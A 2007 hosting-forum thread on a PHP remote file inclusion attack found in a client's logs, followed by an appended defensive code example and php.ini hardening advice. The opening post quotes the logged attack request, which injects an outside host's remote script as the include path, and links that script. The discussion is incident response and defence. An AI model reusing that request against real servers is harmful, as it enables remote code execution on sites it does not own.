

PHP exploit




Posted by samsamdb, 11-25-2007, 04:00 PM
Just discovered a PHP exploit on a client's domain. Found this in the access_log:

http://www.domain.com/blog.php/onead...nhead.php?path[docroot]=http://musicrox1.altervista.org/rmod.txt?&act=ls&d=/home/httpd/vhosts/domain.com/httpdocs/pearus/.bash/&sort=0a

Take a look at rmod.txt: http://musicrox1.altervista.org/rmod.txt

Then found this in a conf.txt in the /pearus/.bash folder. Contents of the .bash folder:

Still trying to dig in some more to figure out how they were able to exploit. Here's the first few lines of their blog.php:

If anyone can think of anything else to dig for, please post. Thanks.

Posted by Harzem, 11-25-2007, 04:04 PM
Is register_globals on?

Posted by Steve_Arm, 11-25-2007, 04:06 PM
Where is $path["docroot"] validated to be what it should be? You need to make this false: http://gr2.php.net/manual/en/ref.fil...llow-url-fopen

Posted by samsamdb, 11-25-2007, 04:07 PM
"PHP 'safe_mode' on" is unchecked in the Plesk control panel for that domain, but register_globals is On in the php.ini.

Posted by samsamdb, 11-25-2007, 04:08 PM
I guess that's where the exploit is .. the customer didn't do any error checking so anyone can override docroot by passing it in the URL parameters ....

Posted by Harzem, 11-25-2007, 04:10 PM
That's where the exploit is. Turn off register_globals at all prices.

Posted by samsamdb, 11-25-2007, 04:17 PM
Done .. globals now off .. if a customer doesn't like it .. let's see what complaints come in ...

Posted by Harzem, 11-25-2007, 04:33 PM
The users that use PHP scripts written in 1985 will complain. If too much is received, you should warn them about security and add a htaccess file for those you want. But let them know they will be asking for trouble.

Posted by samsamdb, 11-25-2007, 04:39 PM
I don't mind that at all ... if they complain, I'll threaten them with "Harzem"! :-)

Posted by foobic, 11-25-2007, 06:29 PM
It's a good idea to turn off register_globals but it won't necessarily solve this problem (although with a bit of luck it may break the script altogether!). Even with register_globals off badly-written scripts that don't validate user inputs can still be vulnerable to remote includes. So don't ignore the other good advice:
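The point foobic makes, as an added example that is not the client's blog.php nor code from anyone in the thread: the include pattern the posts describe beside a version that validates the path, so it stays safe whether register_globals is on or off. The `mod` parameter, the module allow-list and the `lib/` layout are assumptions for illustration.

```php
<?php
// Added example, not from the thread. $path['docroot'] follows the log line
// above; $module, $allowedModules and the lib/ layout are constructed.

// --- The vulnerable shape (illustrative, not the client's actual file) ---
// With register_globals=On, ?path[docroot]=http://... creates $path['docroot']
// before the script runs; with allow_url_fopen=On, include then fetches and
// executes the remote file. Turning register_globals off does not help if the
// script itself copies request data into the path (e.g. $_GET['path']).
//
//   include $path['docroot'] . '/lib/header.php';

// --- Hardened version ---
// 1. The document root is never taken from request data; fix it in the script.
define('DOCROOT', realpath(__DIR__));

// 2. Any request value that ends up in an include path is checked against an
//    allow-list of known module names.
$allowedModules = ['header', 'footer', 'sidebar']; // constructed list
$module = isset($_GET['mod']) ? $_GET['mod'] : 'header';
if (!in_array($module, $allowedModules, true)) {
    http_response_code(400);
    exit('unknown module');
}

// 3. Defence in depth: resolve the final path and require it to stay under
//    DOCROOT. realpath() returns false for URLs and non-existent files, and
//    the prefix check rejects ../ escapes even if the allow-list were bypassed.
$file = realpath(DOCROOT . '/lib/' . $module . '.php');
if ($file === false || strpos($file, DOCROOT . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(400);
    exit('invalid include path');
}
require $file;

// php.ini settings that back this up (server-wide, not per script):
//   register_globals  = Off   ; stops ?path[docroot]=... becoming $path
//   allow_url_include = Off   ; include/require refuse http:// and ftp:// paths
//   allow_url_fopen   = Off   ; as Steve_Arm suggests, if nothing needs it
```

A quick check for the same pattern in other logs is to grep access_log for query strings containing `=http://` or `=https://` in a parameter that feeds an include, then confirm whether the script validated that value.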


